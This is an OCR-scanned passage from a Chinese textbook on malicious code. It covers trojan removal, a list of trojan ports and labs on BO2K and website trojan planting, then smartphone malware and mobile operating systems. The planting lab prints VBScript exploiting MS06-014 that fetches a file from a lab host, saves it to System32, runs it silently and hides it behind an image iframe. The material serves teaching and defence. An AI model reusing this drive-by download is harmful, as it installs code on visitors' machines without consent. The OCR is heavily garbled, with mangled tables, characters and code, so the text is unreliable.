藏 、 只 谈 属 性 ,就 可 以 将 其 删除 。 

删除 后 ,进入 Windows 系统 的 注册 表 中 ,找到 LHKEY_LOCAL_MACHINE\SOFT 
WARE\ Microsoft\ Windows \ CurrentVersion \ Run |] 和 | HKEY LOCAL MACHINE\ 
SOFTWARE \Microsoft\ Windows\CurrentVersion\RunServices | 两 项 ,然后 查找 kernel32. exe 
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和 sysexplr. exe 两 个 键 值 并 删除 。 上 再 找到 LHKEY_CLASSES ROOTANtxtfile\openNXcommand | ， 
看 键 值 是 不 是 已 改 为 “sysexplr. exe%1”, 如 果 是 则 改 回 “notepad. exe %1”。 


5.4.3 已 知 木 马 病毒 的 端口 列表 
已 知 木 马 病 毒 的 端口 列表 如 表 5-2 所 示 。 


表 5-2 已 知 木 马 病毒 的 端口 


BO jammerkillahV 121 2140 
Hackers Paradise 2283 
Stealth Spy 555 2565 
Phase0 555 2583 
NeTadmin 555 2716 
Batonz Backdoor | 006 | ps |] 2 
AIMSpy 777 3791 
Psyber Stream Server 5321 
GabanBus 5550 
Maverick’s Matrix 5742 
FTPOSCMEP po00 
Psyber Streaming Server 6400 
BackDoor 771 
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续 表 
nCommand 545 
ee 23456 
Boo on 26247 
ee 30029 
i 30303 
en 30999 
Com 557 
Ga 3011 
| eer 


Bla 20331 Net Raider 59573341 


5.5 综合 实验 
综合 实验 四 : 网 站 挂 马 实验 


该 实验 所 用 的 挂 马 方法 利用 了 MS06-014 漏洞 。 该 漏洞 是 Windows 的 RDS. Dataspace 
ActiveX 实现 上 存在 漏洞 ,远程 攻击 者 可 能 利用 此 汤 润 获取 主机 的 控制 。 
根据 微软 的 描述 ,在 某 些 情 况 下 ,MDAC 所 捆绑 的 RDS. Dataspace ActiveX 控件 无 法 
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确保 能 够 进行 安全 的 交互 ,导致 远程 代码 执行 泌 洞 ,成 功利 用 这 个 漏洞 的 攻击 者 可 以 完全 控 
制 受 影响 的 系统 。 

【实验 目的 】 

通过 该 实验 等 握 网 站 挂 马 的 方法 。 

【实验 环境 】 

(1) Windows 2000 Professional SP4 。 

2 JIS 5. Xs 

(8) IE。 

【实验 素材 】 

本 书 配 套 素 材 目 录 experimemt\ms06014。 

【实验 步骤 】 

(1) 环境 准备 。 如 图 5-7 所 示 , 把 这 些 文件 用 IIS 发 布 。 其 中 WriteReg. exe 可 以 不 发 
布 。WriteReg. exe 和 WriteReg. pdf 内 容 完 全 一 致 ,只 是 扩展 名 不 同 而 已 。 这 样 做 的 目的 
是 更 加 便于 隐藏 。 


1 ~ 
司 default,htm Microsoft HTML Doc,,, 2010-4-201 


eclipse,jpg ]PEG 图 像 2010-4-20 1 
瑚 ]Find06014.htm Microsoft HTML Doc,,， 2010-4-20 1 
习 ms06-014,htm Microsoft HTML Doc,,, 2010-4-201 
WriteReg.exe 应 用 程序 2010-4-201 
[a] writeReg,pdf PDF 文件 2010-4-20€ 


5-7 ”Web 发布 路 径 及 文件 


(2) 检查 是 否 存 在 该 漏洞 。MS06-014 是 一 个 过 时 的 漏洞 ,在 更 新 及 时 的 操作 系统 中 不 
存在 该 漏洞 。 如 果 不 存 在 该 漏洞 , 则 无 法 进行 后 续 实 验 。 检 查 当 前 操作 系统 是 否 存 在 该 漏 
洞 的 代码 ,如 图 5-8 所 示 。 

(3) 准备 一 个 简单 的 木马 。 本 实验 提供 的 实验 程序 不 是 真正 的 木马 ,仅仅 是 一 个 应 用 
程序 。 该 程序 是 个 可 执行 程序 , 它 要 被 挂 到 网 站 上 ,等 着 别人 来 上 钧 。 该 程序 的 功能 是 执行 
后 把 自己 改名 称 并 存储 到 System32 系统 目录 下 ; 通过 修改 注册 表 , 实 现 自 加 载 。 

(4) 挂 马 核心 代码 。 网 站 挂 马 的 核心 代码 如 图 5-9 所 示 。 

(5) 进一步 伪装 。 尽 管 图 5-9 中 的 代码 可 以 实现 木马 的 植 人 及 在 被 控制 端的 首次 运 
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qhead>ctit1e> 术 汕 NS06-014 涡 洞 </title> 
<seript 1Larguage=YEBSeript> 
on error resumne next 
set zero = document. createFlement ("ob"” & "ject") 
rero. sethttribute “cl” & "assid”, “cl” & “sid:BD” & “9BC556-BSA3-1100-983A-00C04"” & “FC29F36” 
str3 = "Ad” 点 “odb. St" & "ream" 
set F = zero, createobject (str3,"") 
1f Not Err, Number = 0 then 
err, clear 
docunent. write ("<CENTER><font color=00FF003 黑 客 风云 友情 提示 : 恭喜 悠 的 系统 不 存在 NS06-01 才 易 洞 。 
< font ></CENTER>”) 
i 
document, write ("<CENTER><font color=00FF00> 黑 客 风 云 友情 提示 : 危险 您 的 系统 存在 IES06 一 014 漏 洞 ? 中 
<br>cbr 溃 了 地址 : 《a href= http://www. microsoft. com/ china/ technet/security/bulletin/ms086- 
014. mspx >http:/ /www. microsoft. com/ chinal technet/security/bulletin/ms06— 
014, mspx a> font > CENTER>") 
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<script language= YEBScript > 
tj ads 三 “httpi wwW. XXX Com server. exe” 
tj_ads = “http'//192. 168. 1. 112 testtrojarmu writereE. pdf” 
Set df = document. createElement (" object") 
df. setAttribute “classid", “clsid:BI9BCS556-BS5A3-11D0-983A-00CO4FC29E36" 
str="Microsoft. XMLHTTP” 
Set x = df.Create0bject (str, "") 
str="Adodb. Stream” 
set Sour = ee createobject (str,"“) 
Sour, type = 
x*. Oven Peg +] ads, False 
*. Send 
tj_name="writereg. exe” “可 改 为 木马 的 次 件 名 称 
set 了 = df. createobject ("Seriptine. FileSystemObject", 
set sys32 = F.GetSpecialFolder (1) “0D Windows 各 补 六 1 windowsh\system32 立 件 来 ，2 如 存 女 件 来 
tj]_name= F.BuildPath[(sys32,+]_name) 
Sour, open 
Sour, write x.responseBody 
Sour, savetofile +] name,2 
Sour, close 
set R tj = df. createobject ("Shell. Application”, ™") 
R tj.ShellExecute tj name,”,"", “open”",0D 
script> 
<body> 


5-9 网 站 挂 马 核心 代码 


行 , 但 是 却 容易 被 发 现 。 图 5-10 将 进一步 伪装 挂 马 核心 代码 。 经 过 该 部 分 代码 的 伪装 , 受 
害 用 户 运行 挂 马 网 页 时 仅仅 看 到 一 张 图 片 (eclipse. jpg) ,但 是 后 台 却 运行 了 ms06-014. htm 
的 代码 , 即 图 5-5 所 示 的 代码 。 


《<img Src= “eclipse. Jp 


ge" > 
i src= “http: 17192 1686. 1. 112/testtrojan/ms06-014. htm” heieht="0" frameborder="0"> 


图 5-10 伪装 代码 


(6) 执行 过 程 。 当 浏览 网 站 的 用 户 访 问 http://192. 168. 1. 112Vtesttrojan/ 时 ,默认 访 
问 了 其 中 的 default. htm。 该 网 页 呈现 给 用 户 的 是 一 张 图 片 ( 日 食 图 片 ) ,但 后 台 却 运行 了 
ms06 一 014. htm 这 个 挂 马 网 页 。 执 行 后 ,writereg. pdfj 就 下 载 到 了 用 户 的 本 地 。 经 过 日 动 
改名 为 writereg. exe, 进 行 了 有 目 动 的 首次 运行 ,如 图 5-11 所 示 。 

(7) 最 后 结果 。 经 过 运行 后 ,在 被 挂 马 机 天 上 出 现 的 结果 有 以 下 两 个 。 

QD 用 户 机 器 的 System32 目录 下 存在 writereg. exe。 

@ 用 户 机 妖 的 注册 表 项 中 存在 日 动 运行 项 , 即 . 


[HKEY LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"crossbow" = "C:\\WINNT\ 
\system32\\writereg. exe" 
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Ee | http:/ /192.168.1.112,testtrojan, - Microsoft Internet Explorer - [ 脱 机 工作 ] -| x| 
| 文件 (编辑 (E) 查看 ( 作 。 收 着 向 工具 (D 才 助 (H) 3 
| -| QR 外 FP | 局- 
(ehtp:insz.ies1.ii2testroant 压 Ce 咱 展 二 = 


3] 完成 屁 | 国 mtenete 
济 开 地 | | > | Ehttp://192.168,1,112ftes,,. 兴国 加 16:39 


图 5-11 运行 效果 


综合 实验 五 : BO2K 木马 实验 


【实验 目的 】 

(1) 熟悉 BO2K 木马 的 源 代码 。 

(2) 掌握 BO2K 木马 的 原理 和 用 法 。 
【实验 环境 】 


(1) Windows 32 位 操作 系统 。 

(2) Visual Studio 6. 0 编译 环境 。 

【实验 步骤 】 

从 网 上 下 载 文 件 中 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 本 书 配套 素材 目录 
\Experiment\BO2K\)。 文 件 为 工程 文件 bo2k. dsw。 使 用 Visual Studio 6. 0 编译 该 工程 ， 
编译 过程 中 需要 修改 配置 。 

链接 生成 bo2k. exe 可 执行 程序 以 及 客户 端 程序 bo_client. exe。 执 行 bo2k. exe 和 
bo_client. exe 观察 执行 效果 。 

【实验 注意 事项 了 】 

程序 的 设计 思路 参考 下 载 文件 (文档 位 置 : 解压 缩 目 录 \ExperimentNXbo2k\doc\ 设 计 文 
档 . doc 和 解压 缩 目 录 \Experiment\bo2k\doc\ 使 用 方法 . doc) 。 


综合 实验 六 : 木马 病毒 清除 实验 


【实验 目的 】 
擎 握 木马 病毒 清除 的 基本 原理 。 
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【实验 环境 】 

(1) Windows 32 位 操作 系统 。 

(2) Visual Studio 7. 0 编译 环境 。 

【实验 步骤 】 

从 网 上 下 载 文件 中 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配套 素材 目录 
\Experiment\Antitrojan\)。 文 件 Antitrojan. sln 为 工程 文件 。 使 用 Visual Studio 7. 0 编 
译 该 工程 ,生成 Antitrojan. exe 可 执行 程序 。 执 行 Antitrojan. exe 观察 执行 效果 。 

【实验 注意 事项 】 

程序 的 设计 思路 参考 下 载 文件 (文档 位 置 : 解压 缩 目 录 \Experiment\ Antitrojan\doc\ 
设计 文档 . doc) 。 


5.6 习 是 
一 、 填 空 题 
1. 特洛伊 木马 作为 一 种 特殊 的 计算 机 病毒 ,其 首要 特征 是 
2. 从 编程 框架 上 来 看 ,特洛伊 木马 是 一 种 基于 模式 的 远程 控制 程序 ,通过 这 
个 控制 程序 ,黑客 可 以 远程 控制 被 控制 端 。 
3. 反弹 式 木 马 使 用 的 是 端口 ,系统 会 认为 木马 是 普通 应 用 程序 ,而 不 对 其 连 
接 进 行 检查 。 


4. Socket 技术 是 通信 和 领域 的 基石 ,也 是 特洛伊 木马 的 核心 技术 之 一 。 用 户 篆 用 的 两 种 
套 接 字 是 和 


二 、 选 择 题 
1. 著名 特洛伊 木马 “网 络 神偷 ”采用 的 是 ( ) 隐 藏 技术 。 
A. 反弹 式 木 马 技术 B. 远程 线程 插入 技术 
C. ICMP 协议 技术 D. 远程 代码 插入 技术 
2. 下 列 ( ) 不 是 常用 程序 的 默认 端口 。 
A. 80 B. 8080 C. 23 D. 21 
三 、 思 考题 


1. 特洛伊 木马 是 一 种 具有 远程 控制 功能 的 特殊 计算 机 病毒 ,请 论述 木马 .普通 计算 机 
病毒 和 远程 控制 程序 之 间 的 关系 。 

2. 从 对 用 户 危 害 的 角度 ,探讨 特洛伊 木马 的 特殊 之 处 。 

3. 近年 来 ,特洛伊 木马 成 为 了 继 蠕虫 之 后 的 热点 病毒 , 试 述 普通 计算 机 用 户 如 何 预防 
特洛伊 木马 。 

4. 论述 特洛伊 木马 技术 的 发 展 趋势 和 最 新 动向 。 

四 、 实 操 题 

1. 学 习 并 实践 原理 型 的 特洛伊 木马 程序 。 

2. 完成 一 个 常见 木马 的 手工 检测 和 清除 过 程 。 
3. 学 习 并 实践 特洛伊 木马 清除 程序 。 
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2004 年 6 月 ,国际 病毒 组 织 29A 发 布 了 首 例 真正 意义 上 的 概念 性 手机 病毒 一 一 Cabir。 
截止 到 2012 年 年 底 , 仅 Android 平台 上 的 恶意 代码 数量 就 已 经 高 达 35 万 个 。 据 国际 知名 
的 G Data 安全 公司 预测 ,到 2017 年 年 底 ,Android 平台 上 新 产生 的 恶意 代码 样本 数量 将 达 
到 350 万 个 。 在 尽 情 享受 智能 手机 平板 电脑 等 移动 智能 终端 带 来 的 便捷 时 ,这 些 时 尚 的 设 
备 会 给 人 们 带 来 安全 威胁 。 由 于 现在 的 手机 、 平 板 电脑 等 都 具有 上 网 的 功能 ,这 就 大 大 增加 
了 这 些 设备 感染 恶意 代码 的 概率 。 当 前 ,大 量 私密 信息 和 商务 信息 存储 在 移动 终端 设备 上 ， 
一 旦 这 些 设备 受到 恶意 代码 的 入 侵 , 其 杀伤 力 将 远 远 大 于 入 侵 计算 机 载体 的 恶意 代码 。 

本 章 将 以 智能 手机 恶意 代码 为 主线 ,介绍 移动 智能 终端 恶意 代码 的 概念 .技术 进展 和 防 
范 工 具 , 使 读者 了 解 移动 终端 设备 上 的 未 来 威胁 。 

本 章 学 习 目 标 

(1) 了 解 移动 终端 基本 概念 。 

(2) 掌握 移动 终端 恶意 代码 的 基本 概念 。 

(3) 了 解 移动 终端 操作 系统 。 

(4) 了 解 移动 终端 恶意 代码 的 危害 和 防范 。 

(5) 了 解 移动 终端 杀毒 工具 。 


6.1 移动 终端 恶意 代码 概述 


据 QYR 研究 中 心 预测 ,2017 年 全 球 手机 出 货 量 将 超过 20 亿 台 (其 中 智能 手机 占 15. 3 
亿 人 台 ) ,同比 2016 年 增长 2%。 中 国 在 全 球 智能 手机 市 场 中 所 占据 的 份额 约 为 31% ,成 为 全 
球 最 大 的 智能 手机 市 场 。 随 着 越 来 越 多 富裕 的 消费 者 选择 功能 更 丰富 的 智能 手机 ,到 2017 
年 年 底 , 中 国 智能 手机 的 销量 有 望 攀 升 到 4.7 亿 台 

中 国 工 业 与 信息 化 产业 部 发 布 了 2017 年 上 半年 通信 行业 的 运营 数据 ,数据 显示 ,目前 
我 国 移动 电话 用 户 总 数 已 经 达到 13.6 亿 人 ,其 中 通过 手机 上 网 用 户 数 已 经 突破 11 亿 人 。 
男 一 方面 ,市 场 的 突飞猛进 与 Android 手机 的 大 行 其 道 也 不 无 关系 。 根 据 人 研究 机 构 Gartner 
的 数据 ,OPPO、 华 为 .Vivo、 小 米 等 主打 Android 产品 的 厂商 在 市 场 占有 率 排名 中 都 名 列 前 茅 。 

在 智能 手机 大 行 其 道 的 同时 , 受 经 济 利益 驱使 而 产生 的 感染 智能 手机 的 恶意 代码 日 益 
增加 ,移动 终端 恶意 代码 的 发 展 方向 也 转 为 私自 定制 收费 服务 、 网 络 钓鱼 .间谍 软件 .特洛伊 
木马 .勒索 型 恶意 代码 等 。 

国际 知名 的 安全 厂商 McAfee 表示 ,进入 2010 年 ,智能 手机 恶意 代码 进入 空前 活跃 期 ， 
正 以 每 天 4 一 5 种 的 速度 增长 ,2010 年 年 底 , 智 能 手机 恶意 代码 将 超过 2000 种 。 此 后 的 几 
年 ,Android 上 的 恶意 代码 可 谓 是 突飞猛进 。 国 际 知名 的 G Data 安全 公司 给 出 了 2012 年 
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到 2017 年 Android 平台 每 年 新 出 的 恶意 代码 样本 数量 (图 6-1) 。 其 中 ,2017 年 第 一 季度 新 
增 样本 量 为 75. 5 万 个 ,并 据 此 预测 年 度 新 增 样 本 量 为 350 万 个 。 


Android 平 台 年 新 增 恶意 代码 样本 数量 (单位 : 万 ) 


ULD 
(LA 
em 


PT 2013 年 2014 年 2015 年 2016 年 


肯 


6-1 2012 一 2017 年 Android 平台 新 增 恶 意 代 码 样 本 数量 (数据 来 源 G Data) 


2017 年 第 一 季度 ,360 互联 网 安全 中 心 共 截 获 安 时 平台 新 增 恶 意 程 序 样本 222. 8 万 个 ， 
平均 每 天 截获 新 增 手 机 恶意 程序 样本 近 2. 5 万 个 。 累 计 监 测 到 移动 终端 用 户 感 染 恶 意 程序 
5812.7 万 人 次 ,平均 每 天 恶意 程序 感染 量 达 到 了 64. 6 ian 6-2)。 自 2012 年 以 来 , 移 
动 端 从 几 十 万 跨越 到 千 万 级 别 恶意 样本 ,显示 了 移动 恶意 程序 总 体 进入 平稳 高 发 期 。 


恶意 代码 新 增 量 (单位 : 万 ) 感染 量 (单位 : 万 ) 


6-2 2017 年 第 一 季度 Android 恶意 软件 情况 (数据 来 源 360) 


移动 终端 (Mobile Terminal, MT) 涵 盖 现 有 的 和 即将 出 现 的 各 式 各 样 .功能 繁多 的 手机 
和 PDA(Personal Digital Assistant, 个 人 数字 助理 )。 随 着 无 线 移动 通信 技术 和 应 用 的 发 
展 , 它 使 现 有 的 手持 设备 功能 变 得 丰 宣 多彩, 它 可 以 照相 ,摄像 ,可 以 是 一 个 小 型 移动 电视 
机 、 也 可 以 是 可 视 电 话机 ,并 具有 PC 的 大 部 分 功能 ,当然 它 也 可 以 用 于 移动 电子 商务 ,可 作 
认证 ,将 来 还 可 作 持 有 者 身份 证 明 ( 身 份 证 .护照 ) , 它 也 是 个 人 移动 娱乐 终端 。 总 之 ,移动 终 
端 可 以 在 移动 中 完成 语音 .数据 和 图 像 等 各 种 信息 的 交换 和 再 现 。 

迄今 为 止 ,移动 终端 恶意 代码 没有 明确 的 定义 。 在 国内 ,普遍 接受 的 手机 恶意 代码 的 定 
义 是 : ee 以 手机 网 络 和 计算 机 
网 络 为 平台 ,通过 恶意 短信 不 恨 网 站 ,非法 复制 等 形式 ,对 手机 进行 攻击 ,从 而 造成 手机 异 
ql ”以 此 为 参考 ,并 结合 恶意 代码 的 描述 ,给 出 移动 终端 恶意 代码 定义 
如 下 。 

移动 终端 恶意 代码 是 对 移动 终端 各 种 恶意 代码 的 广义 称呼 , 它 包括 以 移动 终端 为 感染 


170 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


对 象 而 设计 的 普通 病毒 、 木 马 等 。 移 动 终端 恶意 代码 以 移动 终端 为 感染 对 象 ,以 移动 终端 网 
络 和 计算 机 网 络 为 平台 ,通过 无 线 或 有 线 通信 等 方式 ,对 移动 终端 进行 攻击 ,从 而 造成 移动 
终端 异常 的 各 种 不 恨 程 序 代码 。 


6.2 和 济 能 手机 操作 系统 及 其 罚 点 


2010 年 以 来 ,出 现 过 Android.10S、Windows Phone 等 多 种 智能 手机 操作 系统 ,市 场 竞 
争 已 经 十 分 激烈 。 经 过 多 年 的 市 场 选择 ,Android 和 iOS 的 大 行 其 道 已 经 让 其 他 众多 的 优 
秀 的 手机 智能 操作 系统 黯然 失色 ,两 者 综合 起 来 可 以 说 已 经 占据 了 大 多 数 的 智能 手机 市 场 。 
图 6-3 所 示 为 2016 年 智能 手机 操作 系统 市 场 份额 统计 图 ,其 中 ,图 6-3(a) 所 示 的 是 调查 统 
计 机 构 Kantar 发 布 的 截止 到 2016 年 12 月 的 中 国 智能 手机 操作 系统 的 份额 数据 。 
图 6-3(b) 所 示 的 是 调查 统计 机 构 NetApplicaitons 发 布 的 截止 到 2016 年 8 月 的 全 球 智能 手 
机 操作 系统 的 份额 数据 。 


中 国 智能 手机 操作 系统 份额 (2016 年 12 月 ) 全 球 智 能 手机 操作 系统 份额 (2016 年 8 月 ) 


Windows Windows Java ME,0.014 


3 


Android 


Android 


0.807 


(a) 中 国 份额 (数据 来 源 : Kantar) (b) 全 球 份额 (数据 来 源 : NetApplicaitons) 
6-3 ”2016 年 智能 手机 操作 系统 市 场 份额 统计 图 


6.2.1 智能 手机 操作 系统 


尽管 有 很 多 智能 手机 操作 系统 ,但 近 两 年 已 经 逐步 稳定 在 Android 和 1OS 两 大 系统 上 ， 
其 他 系统 基本 上 丧失 了 葛 争 力 。 
1. Android 


Android 是 Google 公司 在 2007 年 11 月 公布 的 基于 Linux 平台 的 开源 智能 手机 操作 
系统 。Android 由 操作 系统 .中 间 件 和 应 用 程序 组 成 ,是 首 个 为 移动 终端 打造 的 真正 开放 和 
完整 的 移动 软件 。 它 采用 了 软件 栈 (Software Stack) 的 架构 ,底层 以 Linux 核心 为 基础 ,并 
且 只 提供 基本 功能 。 在 底层 平台 上 ,第 三 方 应 用 软件 则 由 各 公司 日 行 开 发 ,开发 语言 是 跨 平 
台 的 Java 编程 语言 。 为 了 推广 此 技术 ,Google 和 其 他 几 十 个 手机 公司 建立 了 开放 手机 联 
盟 (COpen Handset Alliance, OHA). 
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Android 发 展 迅 速 ,技术 更 新 非常 快 。 截 止 到 2018 年 8 月 8 日 ,最 新 的 发 布 版 本 已 经 
更 新 到 9. 0 版 。 能 顺利 运行 在 32 位 或 64 位 ARM、x86、x86-64、MIPS 和 MIPS64 等 流行 心 
有 

在 所 有 智能 手机 操作 系统 中 ,Android 的 用 户 量 也 是 占有 绝对 的 领先 地 位 的 。 据 维基 
百科 的 数据 ,截止 到 2017 年 5 月 ,Android 的 月 均 活 动用 户 量 达到 20 亿 人 。 

Android 包括 操作 系统 .中 间 件 和 应 用 程序 ,因此 , 宫 括 了 移动 电话 工作 所 需 的 全 部 软 
件 , 而 且 不 存在 任何 以 往 阻碍 移动 产业 创新 的 专 有 权 障 碍 。Google 与 开放 手机 联盟 OHA 
合作 开发 了 Android ,这 个 联盟 由 包括 中 国 移动 摩托罗拉、 高 通 、 宏 达 和 T-Mobile 在 内 的 
30 多 家 技术 和 无 线 应 用 的 领军 企业 组 成 。 通 过 与 运营 商 \ 设 备 制造 商 \ 开 发 商 和 其 他 有 关 
各 方 结 成 深层 次 的 合作 伙伴 关系 ,Google 希望 借助 建立 标准 化 .开放 式 的 移动 电话 软件 平 
台 ,在 移动 产业 内 形成 一 个 开放 式 的 生态 系统 。 

Android 的 一 个 重要 特点 就 是 它 的 应 用 框架 和 GUI 库 都 用 Java 语言 实现 。Android 
内 部 有 一 个 称 为 Dalvik 的 Java 虚拟 机 ,Java 程序 由 这 个 虚拟 机 解释 运行 。Android 平台 的 
应 用 程序 也 必须 用 Java 语言 开发 。Android 应 用 框架 采用 了 Mash-up 的 组 件 模 型 : 组 件 
(Activity) 回 系统 注册 月 己 的 功能 ,每 个 组 件 要 使 用 其 他 组 件 的 服务 时 提出 月 己 的 要 求 
(Intent) ,系统 根据 Intent 在 已 登记 的 组 件 中 确定 合适 的 组 件 。 在 应 用 程序 层 ,Android 提 
供 的 NDK 可 以 供 开发 者 使 用 其 他 高 级 语言 编写 程序 。 

2. iOS 


iOS 是 由 苹果 公司 开发 的 手持 设备 操作 系统 。 任 和 借 出 色 的 用 户 体 验 , 众 多 丰富 的 软件 
文 持 , 加 上 便 件 上 的 精益 求 精 , 在 苹果 出 色 的 营销 体系 下 ,iOS 打败 了 众多 的 新 老 对 手 , 短 短 
几 年 间 迅 速 建立 了 庞大 的 市 场 和 用 户 群 ,获得 了 出 色 的 口碑 。 截 止 到 2017 年 11 月 ,iOS 是 
仅 次 于 Android 的 第 二 大 智能 终端 设备 操作 系统 。 在 10S 的 应 用 市 场 中 有 220 万 个 各 式 应 
用 程序 ,总 计 下 载 次 数 累 计 达 到 1300 亿 次 。 

截至 2018 年 9 月 ,iOS 的 最 新 版 已 经 更 新 到 12。 苹 果 公 司 最 早 于 2007 年 1 月 9 日 的 
Macworld 大 会 上 公布 这 个 系统 ,最 初 是 设计 给 iPhone 使 用 的 ,后 来 陆续 套用 到 iPod 
touch jiPad 以 及 Apple TV 等 苹果 产品 上 。iOS 与 苹果 的 Mac OS X 操作 系统 一 样 , 它 也 是 
以 Darwin 为 基础 的 ,因此 同样 属于 类 UNIX 的 商业 操作 系统 。 原 本 这 个 系统 名 为 iPhone 
OS, 直 到 2010 年 6 月 7 日 WWDC 大 会 上 宣布 改名 为 iDS。 

iOS 的 系统 结构 分 为 四 个 层次 : 核心 操作 系统 (the Core OS Layer)、 核 心服 务 层 (the 
Core Services Layer)、 媒体 层 (the Media Layer) 和 Cocoa 触摸 框架 层 (the Cocoa Touch 
Layer) 。 

3. Windows Phone 


Windows Phone 是 微软 发 布 的 一 天 手机 操作 系统 , 它 将 微软 旗下 的 Xbox Live 游戏 、 
Xbox Music 音乐 与 独特 的 视频 体验 整合 至 手机 中 。2010 年 10 月 11 日 晚上 9 点 30 分 , 微 
软 公司 正 式 发 布 了 智能 手机 操作 系统 Windows Phone, 同 时 将 谷歌 的 Android 和 苹果 的 
iOS 列 为 主要 竞争 对 手 。 

Windows Phone 具有 果 面 定制 .图 标 拖 忠 、 滑 动 控制 等 一 系列 前 卫 的 操作 体验 。 其 主 
屏幕 通过 提供 类 似 仪 表盘 的 体验 来 显示 新 的 电子 邮件 短信、 未 接 来 电 、 日 历 约 会 等 ,让 人 们 
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对 重要 信息 保持 时 刻 更 新 。 它 还 包括 一 个 增强 的 触摸 屏 界 面 ,更 方便 手指 操作 ; 以 及 一 个 
最 新 版 本 的 IE Mobile 浏览 右 一 一 该 浏览 右 在 一 项 由 微软 赞助 的 第 三 方 调查 人 研究 中 ,与 参 
与 调研 的 其 他 浏览 器 和 手机 相 比 ,可 以 执行 指定 任务 的 比例 超过 高 达 48%。 

2015 年 Windows Phone 正式 谢 才 ,取而代之 的 是 Windows 10。2015 年 1 月 ,微软 召 
开 主 题 为 Windows 10 发 布 会 ,发 布 会 上 提出 Windows 10 将 是 一 个 路 平台 的 系统 ,无 论 手 
机 平板 电脑 笔记 本 电脑 .二 合 一 设备 .PC, Windows 10 将 全 面 通用 。 这 也 就 意味 着 
Windows Phone 品牌 将 正式 终结 ,被 统一 命名 的 Windows 10 所 取代 。 

4. Symbian 

1998 年 6 月 , 巾 爱 立信 诺基亚、 摩托 罗拉 和 Psion 共同 出 资 ,筹建 了 Symbian 公司 。 
Symbian 公司 以 开发 和 供应 先进 、 开放、 标准 的 手机 操作 系统 Symbian OS 为 目标 ,同时 癌 
那些 希望 开发 基于 Symbian OS 产品 的 厂商 发 放 软 件 许可 证 。 乌 经 ,围绕 看 Symbian OS 开 
发 和 生产 的 一 系列 软 硬 件 产品 ,在 全 球 掌 上 电脑 和 智能 手机 市 场 上 占据 了 大 部 分 的 份额 。 
Symbian 的 优势 在 于 它 得 到 了 占据 市 场 份额 大 多 数 的 手持 通信 设备 厂商 的 文 持 , 在 Nokia 
的 大 力 倡 导 下 ,成 为 一 个 开放 的 、 易 用 的 .专业 的 开发 平台 ,支持 C++ 和 Java 语言 。 同 时 对 
以 下 方面 提供 平台 级 文 持 。 

(1) 协议 标准 : TCP、IPv4、IPv6、Bluetooth、Java、WAP、SyncML 以 及 USB。 

(2) 通信 能 力 : 支持 多 任务 .面向 对 象 基于 组 件 方式 的 2G.2.5G 和 3G 系统 及 应 用 开 
发 ,GSM .GPRS、HSCSD、EDGE CDMA(KIS-95) 以 及 2000 技术 支持 。 

(3) 信息 定制 : SMS、EMS、 MMS 、EMAIL 和 FAX 支持 。 

(4) 应 用 丰富 : 名 片 管理 .通讯 录 和 信息 服务 等 。 

(5) 安全 稳定 : 数据 完整 性 文 持 ,可 徘 高 效 的 电池 管理 ,数据 同步 数据 加 密 、 证 书 管理 
以 及 软件 安 猴 管理 。 

(6) 多 媒体 : 图 片 .音乐 甚至 视频 浏览 。 

(7) Internet: 因特网 连接 、 浏 览 以 及 内 容 下 载 ,POP3/SMTP/IMAP4。 

(8) 国际 化 : 支持 Unicode、 多 种 字体 和 文字 格式 。 

诺基亚 的 Symbian 操作 系统 运行 速度 非常 出 色 和 稳定 ,软件 成 品 内 存 占用 相对 较 低 。 
但 是 , 它 对 软件 人 员 的 要 求 也 相对 较 高 ,尽管 它 的 Symbian C++ 开发 平台 的 环境 相 比 几 年 前 
已 经 有 了 较 大 的 改观 ,但 是 其 相对 简单 的 文档 资料 和 尚 不 够 完善 的 开发 环境 ,依然 对 开发 者 
的 素质 要 求 甚 高 ,这 影响 了 不 少 开发 人 员 进 入 手机 软件 领域 。 

S。Linux 


应 用 于 智能 手机 上 的 Linux 操作 系统 和 人 们 篆 说 的 应 用 于 计算 机 上 的 Linux 操作 系统 
是 一 样 的 ,而 且 都 是 全 免费 操作 系统 。 在 操作 系统 上 的 免费 ,就 等 于 节省 了 产品 的 生产 成 本 。 

Linux 操作 系统 系统 资源 占用 率 较 低 ,而 且 性 能 比较 稳定 ,这 都 是 大 家 公认 的 。 如 果 以 
Linux 平台 的 系统 资源 占用 程度 与 体积 庞大 的 Windows Mobile 相 比 ,其 结果 可 想 而 知 。 

Linux 操作 系统 与 Java 的 相互 融合 ,是 任何 一 个 操作 系统 所 不 能 比拟 的 ,Linux 加 Java 
的 应 用 方式 ,能够 给 用 户 极 大 的 拓展 空间 。 

不 过 ,Linux 操作 系统 也 不 是 十 全 十 美的 。 由 于 它 介 入 智能 手机 领域 较 晚 ,采用 此 操作 
系统 的 手机 基本 只 有 摩托 罗拉 的 少 部 分 机 型 (如 A780、E680 和 A768i) ,因此 专 为 这 些 少 量 
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用 户 所 制作 的 第 三 方 软件 还 非常 少 , 影 响 了 Linux 操作 系统 在 智能 手机 领域 内 的 势力 扩张 。 

Linux 作为 一 个 完全 开放 的 操作 系统 ,使 得 手机 厂商 进入 所 需 的 门槛 较 低 ,目前 在 市 场 
中 共有 13 家 厂商 选择 Linux 作为 其 智能 手机 的 操作 系统 平台 。 与 Symbian 操作 系统 发 展 
情况 比较 相似 的 是 ,在 整个 Linux 阵营 中 ,摩托 罗拉 在 其 中 所 占 的 市 场 份 额 超过 了 70%% 。 
基于 Linux 较 好 的 开放 性 ,让 许多 手机 厂商 获得 了 进入 智能 手机 市 场 的 敲门砖 ,但 也 是 
Linux 的 开放 性 ,使 得 在 这 一 平台 上 所 开发 的 软件 缺少 一 定 的 标准 性 ,导致 了 许多 应 用 软件 
间 的 兼容 性 有 所 降低 ,这 一 点 在 未 来 势必 会 影响 Linux 市 场 份额 的 增长 。 

6. WebOS 系统 

WebOS 的 前 号 正 是 PDA 时 代为 不 少 日 称 为 “ 胖 友 ”的 Palm, 曾 经 在 市 场 独霸 天 下 的 
Palm 由 于 不 适应 市 场 , 几 年 间 就 来 去 匆匆 了 。 表 现 较 差 的 网 络 浏览 妖 、 在 Palm OS 手机 上 
几乎 永远 见 不 到 的 Wi-Fi 和 GPS, 都 使 得 PalmOS 智能 手机 越 来 越 小 众 。 在 “ 胖 友 ”对 Palm 
